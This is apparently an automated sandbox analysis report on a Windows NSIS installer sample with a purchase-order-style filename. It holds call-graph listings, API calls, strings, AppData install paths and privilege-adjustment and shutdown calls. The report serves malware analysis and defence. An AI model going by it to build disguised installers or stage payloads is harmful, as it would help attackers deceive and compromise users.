4051f4 lstrlenW 3151->3153 3154 40520f 3151->3154 3152->3151 3155 405206 lstrcatW 3153->3155 3153->3159 3156 405222 3154->3156 3157 405215 SetWindowTextW 3154->3157 3155->3154 3158 405228 SendMessageW SendMessageW SendMessageW 3156->3158 3156->3159 3157->3156 3158->3159 3159->3137 3161 405cf5 3160->3161 3161->3137 3162->3123 3164 403255 3163->3164 3164->2960 3166 403b83 3165->3166 3188 405f97 wsprintfW 3166->3188 3168 403bf4 3169 406072 18 API calls 3168->3169 3170 403c00 SetWindowTextW 3169->3170 3171 403924 3170->3171 3172 403c1c 3170->3172 3171->2974 3172->3171 3173 406072 18 API calls 3172->3173 3173->3172 3189 404160 3174->3189 3176 4052cc 3177 404160 SendMessageW 3176->3177 3179 4052de OleUninitialize 3177->3179 3178 4052a5 3178->3176 3192 401389 3178->3192 3179->3007 3181->2970 3183 4038f5 3182->3183 3184 405f51 RegQueryValueExW 3182->3184 3183->2969 3183->2971 3185 405f72 RegCloseKey 3184->3185 3185->3183 3187->2976 3188->3168 3190 404178 3189->3190 3191 404169 SendMessageW 3189->3191 3190->3178 3191->3190 3194 401390 3192->3194 3193 4013fe 3193->3178 3194->3193 3195 4013cb MulDiv SendMessageW 3194->3195 3195->3194 3196->3020 3198 405acc 3197->3198 3199 405ade 3197->3199 3198->3199 3200 405ad9 CharNextW 3198->3200 3201 405b02 3199->3201 3202 405a31 CharNextW 3199->3202 3200->3201 3201->3023 3201->3024 3202->3199 3204 4063b4 3203->3204 3205 4063a9 FindClose 3203->3205 3204->3030 3205->3204 3207 403812 3206->3207 3208 403817 FreeLibrary GlobalFree 3207->3208 3209 4037dc 3207->3209 3208->3208 3208->3209 3210 405841 3209->3210 3211 405b0c 18 API calls 3210->3211 3212 405861 3211->3212 3213 405880 3212->3213 3214 405869 DeleteFileW 3212->3214 3218 4059a0 3213->3218 3249 406050 lstrcpynW 3213->3249 3215 4035f2 OleUninitialize 3214->3215 3215->2861 3215->2862 3217 4058a6 3219 4058b9 3217->3219 3220 4058ac lstrcatW 3217->3220 3218->3215 3223 406393 2 API calls 3218->3223 3222 405a50 2 API calls 3219->3222 3221 4058bf 3220->3221 3224 4058cf lstrcatW 3221->3224 3226 4058da lstrlenW FindFirstFileW 3221->3226 3222->3221 3225 4059c5 3223->3225 3224->3226 3225->3215 3227 4059c9 3225->3227 3226->3218 3237 4058fc 3226->3237 3228 405a04 3 API calls 3227->3228 3229 4059cf 3228->3229 3231 4057f9 5 API calls 3229->3231 3230 405983 FindNextFileW 3234 405999 FindClose 3230->3234 3230->3237 3233 4059db 3231->3233 3235 4059f5 3233->3235 3236 4059df 3233->3236 3234->3218 3239 4051af 25 API calls 3235->3239 3236->3215 3240 4051af 25 API calls 3236->3240 3237->3230 3244 405944 3237->3244 3250 406050 lstrcpynW 3237->3250 3239->3215 3242 4059ec 3240->3242 3241 405841 62 API calls 3241->3244 3243 405ef1 38 API calls 3242->3243 3246 4059f3 3243->3246 3244->3230 3244->3241 3245 4051af 25 API calls 3244->3245 3247 4051af 25 API calls 3244->3247 3248 405ef1 38 API calls 3244->3248 3251 4057f9 3244->3251 3245->3230 3246->3215 3247->3244 3248->3244 3249->3217 3250->3237 3259 405c00 GetFileAttributesW 3251->3259 3254 405814 RemoveDirectoryW 3257 405822 3254->3257 3255 40581c DeleteFileW 3255->3257 3256 405826 3256->3244 3257->3256 3258 405832 SetFileAttributesW 3257->3258 3258->3256 3260 405c12 SetFileAttributesW 3259->3260 3261 405805 3259->3261 3260->3261 3261->3254 3261->3255 3261->3256 3262->3061 3263->3061 3264->3060 3266 405da7 3265->3266 3267 405dcd GetShortPathNameW 3265->3267 3292 405c25 GetFileAttributesW CreateFileW 3266->3292 3269 405de2 3267->3269 3270 405eec 3267->3270 3269->3270 3272 405dea wsprintfA 3269->3272 3270->3079 3271 405db1 CloseHandle GetShortPathNameW 3271->3270 3273 405dc5 3271->3273 3274 406072 18 API calls 3272->3274 3273->3267 3273->3270 3275 405e12 3274->3275 3293 405c25 GetFileAttributesW CreateFileW 3275->3293 3277 405e1f 3277->3270 3278 405e2e GetFileSize GlobalAlloc 3277->3278 3279 405e50 3278->3279 3280 405ee5 CloseHandle 3278->3280 3281 405ca8 ReadFile 3279->3281 3280->3270 3282 405e58 3281->3282 3282->3280 3294 405b8a lstrlenA 3282->3294 3285 405e83 3287 405b8a 4 API calls 3285->3287 3286 405e6f lstrcpyA 3289 405e91 3286->3289 3287->3289 3288 405ec8 SetFilePointer 3290 405cd7 WriteFile 3288->3290 3289->3288 3291 405ede GlobalFree 3290->3291 3291->3280 3292->3271 3293->3277 3295 405bcb lstrlenA 3294->3295 3296 405bd3 3295->3296 3297 405ba4 lstrcmpiA 3295->3297 3296->3285 3296->3286 3297->3296 3298 405bc2 CharNextA 3297->3298 3298->3295 4018 405123 4019 405133 4018->4019 4020 405147 4018->4020 4021 405190 4019->4021 4022 405139 4019->4022 4023 40514f IsWindowVisible 4020->4023 4029 405166 4020->4029 4024 405195 CallWindowProcW 4021->4024 4025 404160 SendMessageW 4022->4025 4023->4021 4026 40515c 4023->4026 4027 405143 4024->4027 4025->4027 4031 404a79 SendMessageW 4026->4031 4029->4024 4036 404af9 4029->4036 4032 404ad8 SendMessageW 4031->4032 4033 404a9c GetMessagePos ScreenToClient SendMessageW 4031->4033 4034 404ad0 4032->4034 4033->4034 4035 404ad5 4033->4035 4034->4029 4035->4032 4045 406050 lstrcpynW 4036->4045 4038 404b0c 4046 405f97 wsprintfW 4038->4046 4040 404b16 4041 40140b 2 API calls 4040->4041 4042 404b1f 4041->4042 4047 406050 lstrcpynW 4042->4047 4044 404b26 4044->4021 4045->4038 4046->4040 4047->4044 4048 401ca3 4049 402ba2 18 API calls 4048->4049 4050 401ca9 IsWindow 4049->4050 4051 401a05 4050->4051 4052 402a27 SendMessageW 4053 402a41 InvalidateRect 4052->4053 4054 402a4c 4052->4054 4053->4054 4055 404228 lstrcpynW lstrlenW 4056 40242a 4057 402cc9 19 API calls 4056->4057 4058 402434 4057->4058 4059 402bbf 18 API calls 4058->4059 4060 40243d 4059->4060 4061 402448 RegQueryValueExW 4060->4061 4066 40281e 4060->4066 4062 40246e RegCloseKey 4061->4062 4063 402468 4061->4063 4062->4066 4063->4062 4067 405f97 wsprintfW 4063->4067 4067->4062 4068 404b2b GetDlgItem GetDlgItem 4069 404b7d 7 API calls 4068->4069 4077 404d96 4068->4077 4070 404c20 DeleteObject 4069->4070 4071 404c13 SendMessageW 4069->4071 4072 404c29 4070->4072 4071->4070 4074 404c60 4072->4074 4076 406072 18 API calls 4072->4076 4073 404e7a 4075 404f26 4073->4075 4079 404d89 4073->4079 4085 404ed3 SendMessageW 4073->4085 4078 404114 19 API calls 4074->4078 4080 404f30 SendMessageW 4075->4080 4081 404f38 4075->4081 4082 404c42 SendMessageW SendMessageW 4076->4082 4077->4073 4088 404a79 5 API calls 4077->4088 4100 404e07 4077->4100 4083 404c74 4078->4083 4086 40417b 8 API calls 4079->4086 4080->4081 4092 404f51 4081->4092 4093 404f4a ImageList_Destroy 4081->4093 4097 404f61 4081->4097 4082->4072 4084 404114 19 API calls 4083->4084 4101 404c82 4084->4101 4085->4079 4090 404ee8 SendMessageW 4085->4090 4091 40511c 4086->4091 4087 404e6c SendMessageW 4087->4073 4088->4100 4089 4050d0 4089->4079 4098 4050e2 ShowWindow GetDlgItem ShowWindow 4089->4098 4096 404efb 4090->4096 4094 404f5a GlobalFree 4092->4094 4092->4097 4093->4092 4094->4097 4095 404d57 GetWindowLongW SetWindowLongW 4099 404d70 4095->4099 4106 404f0c SendMessageW 4096->4106 4097->4089 4112 404af9 4 API calls 4097->4112 4113 404f9c 4097->4113 4098->4079 4102 404d76 ShowWindow 4099->4102 4103 404d8e 4099->4103 4100->4073 4100->4087 4101->4095 4105 404cd2 SendMessageW 4101->4105 4107 404d51 4101->4107 4110 404d0e SendMessageW 4101->4110 4111 404d1f SendMessageW 4101->4111 4119 404149 SendMessageW 4102->4119 4120 404149 SendMessageW 4103->4120 4105->4101 4106->4075 4107->4095 4107->4099 4108 404fe0 4114 4050a6 InvalidateRect 4108->4114 4118 405054 SendMessageW SendMessageW 4108->4118 4110->4101 4111->4101 4112->4113 4113->4108 4115 404fca SendMessageW 4113->4115 4114->4089 4116 4050bc 4114->4116 4115->4108 4121 404a34 4116->4121 4118->4108 4119->4079 4120->4077 4124 40496b 4121->4124 4123 404a49 4123->4089 4125 404984 4124->4125 4126 406072 18 API calls 4125->4126 4127 4049e8 4126->4127 4128 406072 18 API calls 4127->4128 4129 4049f3 4128->4129 4130 406072 18 API calls 4129->4130 4131 404a09 lstrlenW wsprintfW SetDlgItemTextW 4130->4131 4131->4123 4132 40172d 4133 402bbf 18 API calls 4132->4133 4134 401734 SearchPathW 4133->4134 4135 40174f 4134->4135 4136 4045af 4137 4045db 4136->4137 4138 4045ec 4136->4138 4197 405779 GetDlgItemTextW 4137->4197 4139 4045f8 GetDlgItem 4138->4139 4147 404657 4138->4147 4142 40460c 4139->4142 4141 4045e6 4144 4062e4 5 API calls 4141->4144 4145 404620 SetWindowTextW 4142->4145 4150 405aaf 4 API calls 4142->4150 4143 40473b 4146 4048ea 4143->4146 4199 405779 GetDlgItemTextW 4143->4199 4144->4138 4151 404114 19 API calls 4145->4151 4149 40417b 8 API calls 4146->4149 4147->4143 4147->4146 4152 406072 18 API calls 4147->4152 4154 4048fe 4149->4154 4155 404616 4150->4155 4156 40463c 4151->4156 4157 4046cb SHBrowseForFolderW 4152->4157 4153 40476b 4158 405b0c 18 API calls 4153->4158 4155->4145 4162 405a04 3 API calls 4155->4162 4159 404114 19 API calls 4156->4159 4157->4143 4160 4046e3 CoTaskMemFree 4157->4160 4161 404771 4158->4161 4163 40464a 4159->4163 4164 405a04 3 API calls 4160->4164 4200 406050 lstrcpynW 4161->4200 4162->4145 4198 404149 SendMessageW 4163->4198 4166 4046f0 4164->4166 4169 404727 SetDlgItemTextW 4166->4169 4173 406072 18 API calls 4166->4173 4168 404650 4171 40642a 5 API calls 4168->4171 4169->4143 4170 404788 4172 40642a 5 API calls 4170->4172 4171->4147 4180 40478f 4172->4180 4174 40470f lstrcmpiW 4173->4174 4174->4169 4176 404720 lstrcatW 4174->4176 4175 4047d0 4201 406050 lstrcpynW 4175->4201 4176->4169 4178 4047d7 4179 405aaf 4 API calls 4178->4179 4181 4047dd GetDiskFreeSpaceW 4179->4181 4180->4175 4184 405a50 2 API calls 4180->4184 4186 404828 4180->4186 4183 404801 MulDiv 4181->4183 4181->4186 4183->4186 4184->4180 4185 404899 4188 4048bc 4185->4188 4190 40140b 2 API calls 4185->4190 4186->4185 4187 404a34 21 API calls 4186->4187 4189 404886 4187->4189 4202 404136 KiUserCallbackDispatcher 4188->4202 4191 40489b SetDlgItemTextW 4189->4191 4192 40488b 4189->4192 4190->4188 4191->4185 4194 40496b 21 API calls 4192->4194 4194->4185 4195 4048d8 4195->4146 4203 404544 4195->4203 4197->4141 4198->4168 4199->4153 4200->4170 4201->4178 4202->4195 4204 404552 4203->4204 4205 404557 SendMessageW 4203->4205 4204->4205 4205->4146 4206 4042b1 4207 4042c9 4206->4207 4210 4043e3 4206->4210 4211 404114 19 API calls 4207->4211 4208 40444d 4209 404457 GetDlgItem 4208->4209 4212 40451f 4208->4212 4214 404471 4209->4214 4215 4044e0 4209->4215 4210->4208 4210->4212 4216 40441e GetDlgItem SendMessageW 4210->4216 4217 404330 4211->4217 4213 40417b 8 API calls 4212->4213 4219 40451a 4213->4219 4214->4215 4220 404497 6 API calls 4214->4220 4215->4212 4221 4044f2 4215->4221 4237 404136 KiUserCallbackDispatcher 4216->4237 4218 404114 19 API calls 4217->4218 4223 40433d CheckDlgButton 4218->4223 4220->4215 4224 404508 4221->4224 4225 4044f8 SendMessageW 4221->4225 4235 404136 KiUserCallbackDispatcher 4223->4235 4224->4219 4228 40450e SendMessageW 4224->4228 4225->4224 4226 404448 4229 404544 SendMessageW 4226->4229 4228->4219 4229->4208 4230 40435b GetDlgItem 4236 404149 SendMessageW 4230->4236 4232 404371 SendMessageW 4233 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4232->4233 4234 40438e GetSysColor 4232->4234 4233->4219 4234->4233 4235->4230 4236->4232 4237->4226 4238 4027b4 4239 4027ba 4238->4239 4240 4027c2 FindClose 4239->4240 4241 402a4c 4239->4241 4240->4241 4242 401b37 4243 401b44 4242->4243 4244 401b88 4242->4244 4245 401bcd 4243->4245 4251 401b5b 4243->4251 4246 401bb2 GlobalAlloc 4244->4246 4247 401b8d 4244->4247 4248 406072 18 API calls 4245->4248 4258 402288 4245->4258 4249 406072 18 API calls 4246->4249 4247->4258 4263 406050 lstrcpynW 4247->4263 4250 402282 4248->4250 4249->4245 4256 405795 MessageBoxIndirectW 4250->4256 4261 406050 lstrcpynW 4251->4261 4254 401b9f GlobalFree 4254->4258 4255 401b6a 4262 406050 lstrcpynW 4255->4262 4256->4258 4259 401b79 4264 406050 lstrcpynW 4259->4264 4261->4255 4262->4259 4263->4254 4264->4258 4265 402537 4266 402562 4265->4266 4267 40254b 4265->4267 4269 402596 4266->4269 4270 402567 4266->4270 4268 402ba2 18 API calls 4267->4268 4277 402552 4268->4277 4272 402bbf 18 API calls 4269->4272 4271 402bbf 18 API calls 4270->4271 4274 40256e WideCharToMultiByte lstrlenA 4271->4274 4273 40259d lstrlenW 4272->4273 4273->4277 4274->4277 4275 4025ca 4276 4025e0 4275->4276 4278 405cd7 WriteFile 4275->4278 4277->4275 4277->4276 4279 405d06 5 API calls 4277->4279 4278->4276 4279->4275 4280 4014b8 4281 4014be 4280->4281 4282 401389 2 API calls 4281->4282 4283 4014c6 4282->4283 3493 4015b9 3494 402bbf 18 API calls 3493->3494 3495 4015c0 3494->3495 3496 405aaf 4 API calls 3495->3496 3508 4015c9 3496->3508 3497 401629 3499 40165b 3497->3499 3500 40162e 3497->3500 3498 405a31 CharNextW 3498->3508 3502 401423 25 API calls 3499->3502 3501 401423 25 API calls 3500->3501 3503 401635 3501->3503 3511 401653 3502->3511 3513 406050 lstrcpynW 3503->3513 3505 4056fb 2 API calls 3505->3508 3506 405718 5 API calls 3506->3508 3507 401642 SetCurrentDirectoryW 3507->3511 3508->3497 3508->3498 3508->3505 3508->3506 3509 40160f GetFileAttributesW 3508->3509 3510 4015f2 3508->3510 3509->3508 3510->3508 3512 40567e 4 API calls 3510->3512 3512->3510 3513->3507 4284 40293b 4285 402ba2 18 API calls 4284->4285 4286 402941 4285->4286 4287 402964 4286->4287 4288 40297d 4286->4288 4296 40281e 4286->4296 4293 402969 4287->4293 4294 40297a 4287->4294 4289 402993 4288->4289 4290 402987 4288->4290 4292 406072 18 API calls 4289->4292 4291 402ba2 18 API calls 4290->4291 4291->4296 4292->4296 4298 406050 lstrcpynW 4293->4298 4299 405f97 wsprintfW 4294->4299 4298->4296 4299->4296 3545 403c3c 3546 403c54 3545->3546 3547 403d8f 3545->3547 3546->3547 3548 403c60 3546->3548 3549 403da0 GetDlgItem GetDlgItem 3547->3549 3550 403de0 3547->3550 3553 403c6b SetWindowPos 3548->3553 3554 403c7e 3548->3554 3551 404114 19 API calls 3549->3551 3552 403e3a 3550->3552 3562 401389 2 API calls 3550->3562 3557 403dca SetClassLongW 3551->3557 3558 404160 SendMessageW 3552->3558 3563 403d8a 3552->3563 3553->3554 3555 403c83 ShowWindow 3554->3555 3556 403c9b 3554->3556 3555->3556 3559 403ca3 DestroyWindow 3556->3559 3560 403cbd 3556->3560 3561 40140b 2 API calls 3557->3561 3584 403e4c 3558->3584 3564 40409d 3559->3564 3565 403cc2 SetWindowLongW 3560->3565 3566 403cd3 3560->3566 3561->3550 3567 403e12 3562->3567 3564->3563 3576 4040ce ShowWindow 3564->3576 3565->3563 3569 403d7c 3566->3569 3570 403cdf GetDlgItem 3566->3570 3567->3552 3571 403e16 SendMessageW 3567->3571 3568 40409f DestroyWindow EndDialog 3568->3564 3575 40417b 8 API calls 3569->3575 3573 403cf2 SendMessageW IsWindowEnabled 3570->3573 3574 403d0f 3570->3574 3571->3563 3572 40140b 2 API calls 3572->3584 3573->3563 3573->3574 3578 403d1c 3574->3578 3581 403d63 SendMessageW 3574->3581 3582 403d2f 3574->3582 3589 403d14 3574->3589 3575->3563 3576->3563 3577 406072 18 API calls 3577->3584 3578->3581 3578->3589 3579 4040ed SendMessageW 3583 403d4a 3579->3583 3580 404114 19 API calls 3580->3584 3581->3569 3585 403d37 3582->3585 3586 403d4c 3582->3586 3583->3569 3584->3563 3584->3568 3584->3572 3584->3577 3584->3580 3591 404114 19 API calls 3584->3591 3606 403fdf DestroyWindow 3584->3606 3587 40140b 2 API calls 3585->3587 3588 40140b 2 API calls 3586->3588 3587->3589 3590 403d53 3588->3590 3589->3579 3590->3569 3590->3589 3592 403ec7 GetDlgItem 3591->3592 3593 403ee4 ShowWindow KiUserCallbackDispatcher 3592->3593 3594 403edc 3592->3594 3615 404136 KiUserCallbackDispatcher 3593->3615 3594->3593 3596 403f0e EnableWindow 3599 403f22 3596->3599 3597 403f27 GetSystemMenu EnableMenuItem SendMessageW 3598 403f57 SendMessageW 3597->3598 3597->3599 3598->3599 3599->3597 3616 404149 SendMessageW 3599->3616 3617 406050 lstrcpynW 3599->3617 3602 403f85 lstrlenW 3603 406072 18 API calls 3602->3603 3604 403f9b SetWindowTextW 3603->3604 3605 401389 2 API calls 3604->3605 3605->3584 3606->3564 3607 403ff9 CreateDialogParamW 3606->3607 3607->3564 3608 40402c 3607->3608 3609 404114 19 API calls 3608->3609 3610 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3609->3610 3611 401389 2 API calls 3610->3611 3612 40407d 3611->3612 3612->3563 3613 404085 ShowWindow 3612->3613 3614 404160 SendMessageW 3613->3614 3614->3564 3615->3596 3616->3599 3617->3602

                                                                                              Executed Functions

                                                                                              Function 004032A0 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401stringfilecomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 7 4032df 1->7 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 7->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 30 403522-40353c DeleteFileW call 402dee 22->30 31 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->31 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 28 4033b4-4033b8 26->28 29 4033b9-4033bd 26->29 28->29 32 4033c3-4033c9 29->32 33 40347c-403489 call 405a31 29->33 51 403542-403548 30->51 52 4035ed-4035fd call 4037bf OleUninitialize 30->52 31->30 48 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 31->48 37 4033e4-40341d 32->37 38 4033cb-4033d3 32->38 49 40348b-40348c 33->49 50 40348d-403493 33->50 41 40343a-403474 37->41 42 40341f-403424 37->42 39 4033d5-4033d8 38->39 40 4033da 38->40 39->37 39->40 40->37 41->33 47 403476-40347a 41->47 42->41 46 403426-40342e 42->46 54 403430-403433 46->54 55 403435 46->55 47->33 56 40349b-4034a9 call 406050 47->56 48->30 48->52 49->50 50->23 58 403499 50->58 59 4035dd-4035e4 call 403899 51->59 60 40354e-403559 call 405a31 51->60 69 403723-403729 52->69 70 403603-403613 call 405795 ExitProcess 52->70 54->41 54->55 55->41 66 4034ae 56->66 58->66 68 4035e9 59->68 71 4035a7-4035b1 60->71 72 40355b-403590 60->72 66->22 68->52 74 4037a7-4037af 69->74 75 40372b-403741 GetCurrentProcess OpenProcessToken 69->75 79 4035b3-4035c1 call 405b0c 71->79 80 403619-40362d call 405718 lstrcatW 71->80 76 403592-403596 72->76 77 4037b1 74->77 78 4037b5-4037b9 ExitProcess 74->78 82 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 75->82 83 403777-403785 call 40642a 75->83 84 403598-40359d 76->84 85 40359f-4035a3 76->85 77->78 79->52 95 4035c3-4035d9 call 406050 * 2 79->95 96 40363a-403654 lstrcatW lstrcmpiW 80->96 97 40362f-403635 lstrcatW 80->97 82->83 93 403793-40379e ExitWindowsEx 83->93 94 403787-403791 83->94 84->85 89 4035a5 84->89 85->76 85->89 89->71 93->74 98 4037a0-4037a2 call 40140b 93->98 94->93 94->98 95->59 96->52 100 403656-403659 96->100 97->96 98->74 104 403662 call 4056fb 100->104 105 40365b-403660 call 40567e 100->105 110 403667-403675 SetCurrentDirectoryW 104->110 105->110 112 403682-4036ab call 406050 110->112 113 403677-40367d call 406050 110->113 117 4036b0-4036cc call 406072 DeleteFileW 112->117 113->112 120 40370d-403715 117->120 121 4036ce-4036de CopyFileW 117->121 120->117 122 403717-40371e call 405ef1 120->122 121->120 123 4036e0-403700 call 405ef1 call 406072 call 405730 121->123 122->52 123->120 132 403702-403709 CloseHandle 123->132 132->120
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                              • GetVersion.KERNEL32 ref: 004032C9
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                              • GetCommandLineW.KERNEL32(Podning Setup,NSIS Error), ref: 0040334D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00000000), ref: 00403360
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00000020), ref: 00403387
                                                                                                • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Podning Setup,NSIS Error), ref: 0040605D
                                                                                              • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                              • ExitProcess.KERNEL32 ref: 00403613
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403626
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403635
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403640
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00000000,?), ref: 0040364C
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                              • CopyFileW.KERNEL32(00442800,0042AA08,00000001), ref: 004036D6
                                                                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                              • ExitProcess.KERNEL32 ref: 004037B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$Podning Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 2488574733-4201898645
                                                                                              • Opcode ID: d642b4404a9fb060cda4fdd4f2973dfb2e781bfd167540d7ae6d73c1a9f34bb2
                                                                                              • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                              • Opcode Fuzzy Hash: d642b4404a9fb060cda4fdd4f2973dfb2e781bfd167540d7ae6d73c1a9f34bb2
                                                                                              • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004052EE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 133 4052ee-405309 134 405498-40549f 133->134 135 40530f-4053d6 GetDlgItem * 3 call 404149 call 404a4c GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 4054a1-4054c3 GetDlgItem CreateThread FindCloseChangeNotification 134->137 138 4054c9-4054d6 134->138 155 4053f4-4053f7 135->155 156 4053d8-4053f2 SendMessageW * 2 135->156 137->138 140 4054f4-4054fe 138->140 141 4054d8-4054de 138->141 145 405500-405506 140->145 146 405554-405558 140->146 143 4054e0-4054ef ShowWindow * 2 call 404149 141->143 144 405519-405522 call 40417b 141->144 143->140 159 405527-40552b 144->159 150 405508-405514 call 4040ed 145->150 151 40552e-40553e ShowWindow 145->151 146->144 148 40555a-405560 146->148 148->144 157 405562-405575 SendMessageW 148->157 150->144 153 405540-405549 call 4051af 151->153 154 40554e-40554f call 4040ed 151->154 153->154 154->146 162 405407-40541e call 404114 155->162 163 4053f9-405405 SendMessageW 155->163 156->155 164 405677-405679 157->164 165 40557b-4055a6 CreatePopupMenu call 406072 AppendMenuW 157->165 172 405420-405434 ShowWindow 162->172 173 405454-405475 GetDlgItem SendMessageW 162->173 163->162 164->159 170 4055a8-4055b8 GetWindowRect 165->170 171 4055bb-4055d0 TrackPopupMenu 165->171 170->171 171->164 175 4055d6-4055ed 171->175 176 405443 172->176 177 405436-405441 ShowWindow 172->177 173->164 174 40547b-405493 SendMessageW 